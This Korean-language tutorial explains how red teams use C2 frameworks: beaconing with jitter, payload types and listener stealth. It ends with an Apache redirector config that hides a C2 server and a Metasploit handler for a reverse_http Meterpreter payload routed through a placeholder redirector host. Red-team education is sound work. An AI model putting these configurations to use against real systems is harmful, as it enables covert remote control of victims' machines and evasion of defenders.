C2 프레임워크 개요
명령 및 제어(Command and Control) 프레임워크는 레드팀 운영의 핵심 요소로, 침투된 시스템 관리와 내부 네트워크 이동을 효율화합니다. 주요 구성 요소와 작동 원리는 다음과 같습니다.
C2 서버와 에이전트
C2 서버는 중앙 제어 지점으로 작동하며, 에이전트는 대상 시스템에서 실행되어 서버의 명령을 실행합니다. Netcat 리스너와의 차이점은 세션 관리 기능과 확장성에 있습니다.
비콘 통신 메커니즘
에이전트는 정기적으로 C2 서버에 비콘을 전송합니다. 이 통신은 두 가지 기법으로 위장할 수 있습니다:
- 슬립 타이머: 명령 대기 간격 제어
- 지터: 통신 시간 임의 변동
import random
base_delay = 60
variation = random.randint(-15, 15)
adjusted_delay = base_delay + variation
페이로드 유형
| 유형 | 특징 | 동작 방식 |
|---|---|---|
| 스테이지리스 | 완전한 에이전트 포함 | 실행 즉시 비콘 시작 |
| 스테이지드 | 다운로더 방식 | 1단계: 초기 실행체 삽입 2단계: 추가 구성 요소 다운로드 |
주요 모듈 기능
- 후침투 모듈: 초기 접근 후 활동 처리 (자격 증명 추출, 시스템 분석)
- 피벗 모듈: 제한된 네트워크 세그먼트 접근 지원
주요 C2 프레임워크
오픈소스 솔루션
- Metasploit: 종합적 취약점 활용 프레임워크
- Armitage: Metasploit 기반 GUI 환경
- Covenant: C# 기반 HTTP/HTTPS/SMB 지원
상용 솔루션
- Cobalt Strike: 고급 레드팀 기능 통합
- Brute Ratel: 맞춤형 적대적 시뮬레이션 환경
C2 운영 보안
OPSEC(작전 보안)은 C2 인프라 관리의 핵심입니다:
- 공개 접근 차단: 관리 인터페이스 노출 최소화
- SSH 터널 활용: 안전한 원격 접근 구성
ssh -L 55554:127.0.0.1:55554 user@c2_server
리스너 유형 비교
| 유형 | 프로토콜 | 탐지 위험도 |
|---|---|---|
| 표준 | TCP/UDP | 높음 |
| HTTP/HTTPS | 웹 트래픽 | 중간 |
| DNS | 도메인 질의 | 낮음 |
고급 구성: 리다이렉터
실제 C2 서버를 숨기기 위해 아파치 모듈을 활용한 리다이렉터 구성:
<VirtualHost *:80>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} "^CustomAgent$"
ProxyPass "/" "http://localhost:8080/"
</VirtualHost>
메타스플로이트 핸들러 설정:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set OverrideLHOST redirector_ip
set OverrideRequestHost true
선택 가이드
C2 프레임워크 선택 시 고려사항:
- 목표 환경: 네트워크 제한 사항 분석
- 예산: 상용/오픈소스 솔루션 비교
- AV 회피: 커스텀 페이로드 생성 필요성